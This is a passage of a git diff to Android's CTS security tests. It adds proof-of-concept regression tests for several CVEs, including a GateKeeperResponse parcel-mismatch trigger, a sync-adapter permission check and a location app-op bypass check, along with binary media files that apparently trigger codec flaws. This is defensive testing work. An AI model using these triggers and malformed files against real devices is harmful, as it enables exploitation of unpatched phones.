+ if (mOverridePackageName != null) {
+ return mOverridePackageName;
+ }
+ return super.getPackageName();
+ }
+ }
+
/**
* Test whether media button receiver can be a explicit broadcast receiver via
* MediaSession.setMediaButtonReceiver(PendingIntent).
diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp
index cf064c6e1c4..c95a885289d 100644
--- a/tests/tests/security/Android.bp
+++ b/tests/tests/security/Android.bp
@@ -77,6 +77,9 @@ android_test {
data: [
":RolePermissionOverrideTestApp",
":SplitBluetoothPermissionTestApp",
+ ":CtsUsePermissionApp22_2",
+ ":CtsHelperAppOverlay",
+ ":CtsDummyTargetApi15TestApp",
],
}
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 186c5e2ab7b..e3950ad70b1 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -201,6 +201,21 @@
</intent-filter>
</activity>
+ <provider android:name="android.security.cts.CVE_2022_20358.PocContentProvider"
+ android:authorities="android.security.cts.CVE_2022_20358.provider"
+ android:enabled="true"
+ android:exported="true" />
+
+ <service android:name="android.security.cts.CVE_2022_20358.PocSyncService"
+ android:enabled="true"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.content.SyncAdapter" />
+ </intent-filter>
+ <meta-data android:name="android.content.SyncAdapter"
+ android:resource="@xml/syncadapter" />
+ </service>
+
</application>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml
index 9bd5eb7e0a8..751748e5bcd 100644
--- a/tests/tests/security/AndroidTest.xml
+++ b/tests/tests/security/AndroidTest.xml
@@ -48,10 +48,14 @@
<option name="run-command" value="mkdir -p /data/local/tmp/cts/security" />
<option name="teardown-command" value="rm -rf /data/local/tmp/cts"/>
</target_preparer>
+
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
<option name="cleanup" value="true" />
<option name="push" value="RolePermissionOverrideTestApp.apk->/data/local/tmp/cts/security/RolePermissionOverrideTestApp.apk" />
<option name="push" value="SplitBluetoothPermissionTestApp.apk->/data/local/tmp/cts/security/SplitBluetoothPermissionTestApp.apk" />
+ <option name="push" value="CtsDummyTargetApi15TestApp.apk->/data/local/tmp/cts/security/CtsDummyTargetApi15TestApp.apk" />
+ <option name="push" value="CtsUsePermissionApp22_2.apk->/data/local/tmp/cts/permission3/CtsUsePermissionApp22_2.apk" />
+ <option name="push" value="CtsHelperAppOverlay.apk->/data/local/tmp/cts/permission3/CtsHelperAppOverlay.apk" />
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
diff --git a/tests/tests/security/aidl/android/security/cts/IBitmapService.aidl b/tests/tests/security/aidl/android/security/cts/IBitmapService.aidl
index b9694c32af7..24e55c5cc79 100644
--- a/tests/tests/security/aidl/android/security/cts/IBitmapService.aidl
+++ b/tests/tests/security/aidl/android/security/cts/IBitmapService.aidl
@@ -22,4 +22,5 @@ interface IBitmapService {
int getAllocationSize(in BitmapWrapper bitmap);
boolean didReceiveBitmap(in BitmapWrapper bitmap);
boolean ping();
+ void exit();
}
diff --git a/tests/tests/security/res/raw/cve_2022_22083.ape b/tests/tests/security/res/raw/cve_2022_22083.ape
new file mode 100644
index 00000000000..05d6d730cfa
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_22083.ape
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2022_22084.qcp b/tests/tests/security/res/raw/cve_2022_22084.qcp
new file mode 100644
index 00000000000..c41d21ec9ff
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_22084.qcp
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2022_22085.dts b/tests/tests/security/res/raw/cve_2022_22085.dts
new file mode 100644
index 00000000000..3a886317ae8
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_22085.dts
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2022_22086.3gp b/tests/tests/security/res/raw/cve_2022_22086.3gp
new file mode 100644
index 00000000000..715d10c1a2b
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_22086.3gp
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2022_22087.mkv b/tests/tests/security/res/raw/cve_2022_22087.mkv
new file mode 100644
index 00000000000..0b25fe47095
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_22087.mkv
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2022_25657.mkv b/tests/tests/security/res/raw/cve_2022_25657.mkv
new file mode 100644
index 00000000000..3d5f70ed561
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_25657.mkv
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2022_25659.mkv b/tests/tests/security/res/raw/cve_2022_25659.mkv
new file mode 100644
index 00000000000..9eda647727b
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2022_25659.mkv
Binary files differ
diff --git a/tests/tests/security/res/xml/syncadapter.xml b/tests/tests/security/res/xml/syncadapter.xml
new file mode 100644
index 00000000000..478fad5327f
--- /dev/null
+++ b/tests/tests/security/res/xml/syncadapter.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<sync-adapter xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="CVE_2022_20358_acc"
+ android:isAlwaysSyncable="true" />
diff --git a/tests/tests/security/src/android/security/cts/BitmapService.java b/tests/tests/security/src/android/security/cts/BitmapService.java
index c532e05e906..ec39ab0640b 100644
--- a/tests/tests/security/src/android/security/cts/BitmapService.java
+++ b/tests/tests/security/src/android/security/cts/BitmapService.java
@@ -40,6 +40,11 @@ public class BitmapService extends Service {
public boolean ping() {
return true;
}
+
+ @Override
+ public void exit() {
+ System.exit(0);
+ }
};
@Nullable
diff --git a/tests/tests/security/src/android/security/cts/BitmapTest.java b/tests/tests/security/src/android/security/cts/BitmapTest.java
index 5ce81fd9d95..05273661eed 100644
--- a/tests/tests/security/src/android/security/cts/BitmapTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapTest.java
@@ -25,11 +25,12 @@ import android.graphics.Bitmap;
import android.os.BadParcelableException;
import android.os.IBinder;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
import androidx.test.platform.app.InstrumentationRegistry;
import androidx.test.runner.AndroidJUnit4;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
import com.google.common.util.concurrent.AbstractFuture;
import org.junit.After;
@@ -48,6 +49,7 @@ public class BitmapTest extends StsExtraBusinessLogicTestCase {
private Instrumentation mInstrumentation;
private PeerConnection mRemoteConnection;
private IBitmapService mRemote;
+ private Intent mIntent;
public static class PeerConnection extends AbstractFuture<IBitmapService>
implements ServiceConnection {
@@ -80,6 +82,9 @@ public class BitmapTest extends StsExtraBusinessLogicTestCase {
if (mRemoteConnection != null) {
final Context context = mInstrumentation.getContext();
context.unbindService(mRemoteConnection);
+ try {
+ mRemote.exit();
+ } catch (Exception ex) { }
mRemote = null;
mRemoteConnection = null;
}
@@ -88,12 +93,11 @@ public class BitmapTest extends StsExtraBusinessLogicTestCase {
IBitmapService getRemoteService() throws ExecutionException, InterruptedException {
if (mRemote == null) {
final Context context = mInstrumentation.getContext();
- Intent intent = new Intent();
- intent.setComponent(new ComponentName(
+ mIntent = new Intent();
+ mIntent.setComponent(new ComponentName(
"android.security.cts", "android.security.cts.BitmapService"));
mRemoteConnection = new PeerConnection();
- context.bindService(intent, mRemoteConnection,
- Context.BIND_AUTO_CREATE | Context.BIND_IMPORTANT);
+ context.bindService(mIntent, mRemoteConnection, Context.BIND_AUTO_CREATE);
mRemote = mRemoteConnection.get();
}
return mRemote;
diff --git a/tests/tests/security/src/android/security/cts/CVE_2019_9376.java b/tests/tests/security/src/android/security/cts/CVE_2019_9376.java
index b5896f179de..5c0f342fa68 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2019_9376.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2019_9376.java
@@ -25,12 +25,13 @@ import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import android.os.Parcel;
import androidx.test.runner.AndroidJUnit4;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(AndroidJUnit4.class)
-public class CVE_2019_9376 {
+public class CVE_2019_9376 extends StsExtraBusinessLogicTestCase {
@AppModeFull
@AsbSecurityTest(cveBugId = 129287265)
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20135.java b/tests/tests/security/src/android/security/cts/CVE_2022_20135.java
new file mode 100644
index 00000000000..2789ff85d10
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20135.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+
+import android.os.Bundle;
+import android.os.Parcel;
+import android.os.Parcelable;
+import android.platform.test.annotations.AppModeFull;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Field;
+
+@AppModeFull
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20135 extends StsExtraBusinessLogicTestCase {
+
+ @Test
+ @AsbSecurityTest(cveBugId = 220303465)
+ public void testPocCVE_2022_20135() {
+ Bundle bundle = new Bundle();
+ try {
+ Class clazz = Class.forName("android.service.gatekeeper.GateKeeperResponse");
+ assumeNotNull(clazz);
+ Object obj = clazz.getMethod("createGenericResponse", int.class).invoke(null, 0);
+ assumeNotNull(obj);
+ Field field = clazz.getDeclaredField("mPayload");
+ assumeNotNull(field);
+ field.setAccessible(true);
+ field.set(obj, new byte[0]);
+ bundle.putParcelable("1", (Parcelable) obj);
+ bundle.putByteArray("2", new byte[1000]);
+ } catch (Exception ex) {
+ assumeNoException(ex);
+ }
+ Parcel parcel = Parcel.obtain();
+ assumeNotNull(parcel);
+ parcel.writeBundle(bundle);
+ parcel.setDataPosition(0);
+ Bundle newBundle = new Bundle();
+ newBundle.readFromParcel(parcel);
+ newBundle.keySet();
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20358/CVE_2022_20358.java b/tests/tests/security/src/android/security/cts/CVE_2022_20358/CVE_2022_20358.java
new file mode 100644
index 00000000000..b1ff1688ced
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20358/CVE_2022_20358.java
@@ -0,0 +1,120 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20358;
+
+import static org.junit.Assert.fail;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.accounts.Account;
+import android.app.Instrumentation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.ISyncAdapter;
+import android.content.Intent;
+import android.content.ServiceConnection;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.RemoteCallback;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.concurrent.TimeoutException;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20358 extends StsExtraBusinessLogicTestCase implements ServiceConnection {
+ static final int TIMEOUT_SEC = 10;
+ Semaphore mWaitResultServiceConn;
+ boolean mIsAssumeFail = false;
+ String mAssumeFailMsg = "";
+
+ @AsbSecurityTest(cveBugId = 203229608)
+ @Test
+ public void testPocCVE_2022_20358() {
+ try {
+ // Bind to the PocSyncService
+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ Context context = instrumentation.getContext();
+ Intent intent = new Intent(context, PocSyncService.class);
+ intent.setAction("android.content.SyncAdapter");
+ CompletableFuture<String> callbackReturn = new CompletableFuture<>();
+ RemoteCallback cb = new RemoteCallback((Bundle result) -> {
+ callbackReturn.complete(result.getString("fail"));
+ });
+ intent.putExtra("callback", cb);
+ context.bindService(intent, this, Context.BIND_AUTO_CREATE);
+
+ // Wait for some result from the PocSyncService
+ mWaitResultServiceConn = new Semaphore(0);
+ assumeTrue(mWaitResultServiceConn.tryAcquire(TIMEOUT_SEC, TimeUnit.SECONDS));
+ assumeTrue(mAssumeFailMsg, !mIsAssumeFail);
+
+ // Wait for a result to be set from onPerformSync() of PocSyncAdapter
+ callbackReturn.get(TIMEOUT_SEC, TimeUnit.SECONDS);
+
+ // In presence of vulnerability, the above call succeeds and TimeoutException is not
+ // triggered so failing the test
+ fail("Vulnerable to b/203229608!!");
+ } catch (Exception e) {
+ if (e instanceof TimeoutException) {
+ // The fix is present so returning from here
+ return;
+ }
+ assumeNoException(e);
+ }
+ }
+
+ @Override
+ public void onServiceConnected(ComponentName name, IBinder service) {
+ try {
+ if (mWaitResultServiceConn == null) {
+ mWaitResultServiceConn = new Semaphore(0);
+ }
+ ISyncAdapter adapter = ISyncAdapter.Stub.asInterface(service);
+ Account account = new Account("CVE_2022_20358_user", "CVE_2022_20358_acc");
+ adapter.startSync(null, "android.security.cts.CVE_2022_20358.provider", account, null);
+ mWaitResultServiceConn.release();
+ } catch (Exception e) {
+ try {
+ mWaitResultServiceConn.release();
+ mAssumeFailMsg = e.getMessage();
+ mIsAssumeFail = true;
+ } catch (Exception ex) {
+ // ignore all exceptions
+ }
+ }
+ }
+
+ @Override
+ public void onServiceDisconnected(ComponentName name) {
+ try {
+ mWaitResultServiceConn.release();
+ } catch (Exception e) {
+ // ignore all exceptions
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20358/PocContentProvider.java b/tests/tests/security/src/android/security/cts/CVE_2022_20358/PocContentProvider.java
new file mode 100644
index 00000000000..0bc8c2c5fed
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20358/PocContentProvider.java
@@ -0,0 +1,56 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20358;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+
+public class PocContentProvider extends ContentProvider {
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return null;
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs,
+ String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20358/PocSyncService.java b/tests/tests/security/src/android/security/cts/CVE_2022_20358/PocSyncService.java
new file mode 100644
index 00000000000..08fbf92d8e5
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20358/PocSyncService.java
@@ -0,0 +1,79 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20358;
+
+import android.accounts.Account;
+import android.app.Service;
+import android.content.AbstractThreadedSyncAdapter;
+import android.content.ContentProviderClient;
+import android.content.Context;
+import android.content.Intent;
+import android.content.SyncResult;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.RemoteCallback;
+
+public class PocSyncService extends Service {
+ private static PocSyncAdapter sSyncAdapter = null;
+ private static final Object sSyncAdapterLock = new Object();
+ RemoteCallback mCb;
+
+ @Override
+ public void onCreate() {
+ try {
+ synchronized (sSyncAdapterLock) {
+ if (sSyncAdapter == null) {
+ sSyncAdapter = new PocSyncAdapter(this);
+ }
+ }
+ } catch (Exception e) {
+ // ignore all exceptions
+ }
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ try {
+ mCb = (RemoteCallback) intent.getExtra("callback");
+ } catch (Exception e) {
+ // ignore all exceptions
+ }
+ return sSyncAdapter.getSyncAdapterBinder();
+ }
+
+ public class PocSyncAdapter extends AbstractThreadedSyncAdapter {
+
+ public PocSyncAdapter(Context context) {
+ super(context, false);
+ }
+
+ @Override
+ public void onPerformSync(Account account, Bundle extras, String authority,
+ ContentProviderClient provider, SyncResult syncResult) {
+ try {
+ if (account.type.equals("CVE_2022_20358_acc")
+ && account.name.equals("CVE_2022_20358_user")) {
+ Bundle res = new Bundle();
+ res.putString("fail", "");
+ mCb.sendResult(res);
+ }
+ } catch (Exception e) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/LocationDisabledAppOpsTest.java b/tests/tests/security/src/android/security/cts/LocationDisabledAppOpsTest.java
new file mode 100644
index 00000000000..c6b7e35b4ef
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/LocationDisabledAppOpsTest.java
@@ -0,0 +1,132 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static android.app.AppOpsManager.MODE_ALLOWED;
+import static android.app.AppOpsManager.OPSTR_FINE_LOCATION;
+
+import static com.android.compatibility.common.util.SystemUtil.eventually;
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+
+import android.app.ActivityManager;
+import android.app.AppOpsManager;
+import android.content.Context;
+import android.content.pm.ApplicationInfo;
+import android.content.pm.PackageInfo;
+import android.location.LocationManager;
+import android.os.PackageTagsList;
+import android.os.Process;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class LocationDisabledAppOpsTest extends StsExtraBusinessLogicTestCase {
+
+ private final Context mContext = InstrumentationRegistry.getContext();
+ private LocationManager mLm;
+ private AppOpsManager mAom;
+
+ @Before
+ public void setUp() {
+ mLm = mContext.getSystemService(LocationManager.class);
+ mAom = mContext.getSystemService(AppOpsManager.class);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 231496105)
+ public void testLocationAppOpIsIgnoredForAppsWhenLocationIsDisabled() {
+ PackageTagsList ignoreList = mLm.getIgnoreSettingsAllowlist();
+
+ UserHandle[] userArr = {UserHandle.SYSTEM};
+ runWithShellPermissionIdentity(() -> {
+ userArr[0] = UserHandle.of(ActivityManager.getCurrentUser());
+ });
+
+ UserHandle user = userArr[0];
+
+ boolean wasEnabled = mLm.isLocationEnabledForUser(user);
+
+ try {
+ runWithShellPermissionIdentity(() -> {
+ mLm.setLocationEnabledForUser(false, user);
+ });
+ List<PackageInfo> pkgs =
+ mContext.getPackageManager().getInstalledPackagesAsUser(
+ 0, user.getIdentifier());
+
+ eventually(() -> {
+ List<String> bypassedNoteOps = new ArrayList<>();
+ List<String> bypassedCheckOps = new ArrayList<>();
+ for (PackageInfo pi : pkgs) {
+ ApplicationInfo ai = pi.applicationInfo;
+ if (ai.uid != Process.SYSTEM_UID) {
+ final int[] mode = {MODE_ALLOWED};
+ runWithShellPermissionIdentity(() -> {
+ mode[0] = mAom.noteOpNoThrow(
+ OPSTR_FINE_LOCATION, ai.uid, ai.packageName);
+ });
+ if (mode[0] == MODE_ALLOWED && !ignoreList.containsAll(pi.packageName)) {
+ bypassedNoteOps.add(pi.packageName);
+ }
+
+
+ mode[0] = MODE_ALLOWED;
+ runWithShellPermissionIdentity(() -> {
+ mode[0] = mAom
+ .checkOpNoThrow(OPSTR_FINE_LOCATION, ai.uid, ai.packageName);
+ });
+ if (mode[0] == MODE_ALLOWED && !ignoreList.includes(pi.packageName)) {
+ bypassedCheckOps.add(pi.packageName);
+ }
+
+ }
+ }
+
+ String msg = "";
+ if (!bypassedNoteOps.isEmpty()) {
+ msg += "Apps which still have access from noteOp " + bypassedNoteOps;
+ }
+ if (!bypassedCheckOps.isEmpty()) {
+ msg += (msg.isEmpty() ? "" : "\n\n")
+ + "Apps which still have access from checkOp " + bypassedCheckOps;
+ }
+ if (!msg.isEmpty()) {
+ Assert.fail(msg);
+ }
+ });
+ } finally {
+ runWithShellPermissionIdentity(() -> {
+ mLm.setLocationEnabledForUser(wasEnabled, user);
+ });
+ }
+ }
+
+}
+
diff --git a/tests/tests/security/src/android/security/cts/PackageInstallerTest.java b/tests/tests/security/src/android/security/cts/PackageInstallerTest.java
index 887538ba2c8..ddea21385d8 100644
--- a/tests/tests/security/src/android/security/cts/PackageInstallerTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageInstallerTest.java
@@ -21,23 +21,24 @@ import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
import com.android.cts.install.lib.Install;
import com.android.cts.install.lib.TestApp;
import com.android.cts.install.lib.Uninstall;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
-import org.junit.runners.JUnit4;
import java.util.concurrent.TimeUnit;
-@RunWith(JUnit4.class)
+@RunWith(AndroidJUnit4.class)
@AppModeFull
-public class PackageInstallerTest {
+public class PackageInstallerTest extends StsExtraBusinessLogicTestCase {
private static final String TEST_APP_NAME = "android.security.cts.packageinstallertestapp";
diff --git a/tests/tests/security/src/android/security/cts/PackageManagerTest.java b/tests/tests/security/src/android/security/cts/PackageManagerTest.java
new file mode 100644
index 00000000000..8c27a70a391
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/PackageManagerTest.java
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static android.content.pm.PackageManager.COMPONENT_ENABLED_STATE_ENABLED;
+
+import static com.android.compatibility.common.util.ShellUtils.runShellCommand;
+
+import static org.hamcrest.MatcherAssert.assertThat;
+import static org.hamcrest.Matchers.containsString;
+import static org.hamcrest.Matchers.not;
+import static org.hamcrest.core.Is.is;
+
+import android.Manifest;
+import android.content.ComponentName;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AppModeFull;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.File;
+
+@AppModeFull
+@RunWith(AndroidJUnit4.class)
+public class PackageManagerTest extends StsExtraBusinessLogicTestCase {
+ private static final String DUMMY_API15_APK_PATH =
+ "/data/local/tmp/cts/security/CtsDummyTargetApi15TestApp.apk";
+ private static final String DUMMY_API15_PACKAGE_NAME =
+ "android.security.cts.dummy.api15";
+ private static final ComponentName INVALID_COMPONENT_NAME =
+ ComponentName.createRelative(DUMMY_API15_PACKAGE_NAME, ".InvalidClassName");
+
+ private PackageManager mPackageManager;
+
+ @Before
+ public void setUp() {
+ mPackageManager = InstrumentationRegistry.getInstrumentation()
+ .getTargetContext().getPackageManager();
+
+ installPackage(DUMMY_API15_APK_PATH);
+ InstrumentationRegistry
+ .getInstrumentation()
+ .getUiAutomation()
+ .adoptShellPermissionIdentity(Manifest.permission.CHANGE_COMPONENT_ENABLED_STATE);
+ }
+
+ @After
+ public void tearDown() {
+ InstrumentationRegistry.getInstrumentation().getUiAutomation()
+ .dropShellPermissionIdentity();
+ uninstallPackage(DUMMY_API15_PACKAGE_NAME);
+ }
+
+ @AsbSecurityTest(cveBugId = 240936919)
+ @Test
+ public void setComponentEnabledSetting_targetPkgIsApi15_withInvalidComponentName() {
+ mPackageManager.setComponentEnabledSetting(
+ INVALID_COMPONENT_NAME, COMPONENT_ENABLED_STATE_ENABLED, 0 /* flags */);
+ assertThat(mPackageManager.getComponentEnabledSetting(INVALID_COMPONENT_NAME),
+ not(is(COMPONENT_ENABLED_STATE_ENABLED)));
+ }
+
+ private static void installPackage(String apkPath) {
+ assertThat(new File(apkPath).exists(), is(true));
+ final StringBuilder cmd = new StringBuilder("pm install ");
+ cmd.append(apkPath);
+ final String result = runShellCommand(cmd.toString()).trim();
+ assertThat(result, containsString("Success"));
+ }
+
+ private static void uninstallPackage(String packageName) {
+ final StringBuilder cmd = new StringBuilder("pm uninstall ");
+ cmd.append(packageName);
+ runShellCommand(cmd.toString());
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/PermissionReviewTapjackingTest.kt b/tests/tests/security/src/android/security/cts/PermissionReviewTapjackingTest.kt
new file mode 100644
index 00000000000..32b1941a7ca
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/PermissionReviewTapjackingTest.kt
@@ -0,0 +1,173 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts
+
+import android.app.Instrumentation
+import android.app.UiAutomation
+import android.content.Context
+import android.content.ComponentName
+import android.content.Intent
+import android.content.pm.PackageManager
+import android.platform.test.annotations.AsbSecurityTest
+import android.provider.Settings
+import android.support.test.uiautomator.By
+import android.support.test.uiautomator.BySelector
+import android.support.test.uiautomator.UiDevice
+import android.support.test.uiautomator.UiObject2
+import android.support.test.uiautomator.Until
+import androidx.test.InstrumentationRegistry
+import com.android.compatibility.common.util.SystemUtil.runShellCommand
+import com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity
+import org.junit.After
+import org.junit.Assert
+import org.junit.Assume.assumeFalse
+import org.junit.Before
+import org.junit.Test
+import java.lang.Exception
+
+/**
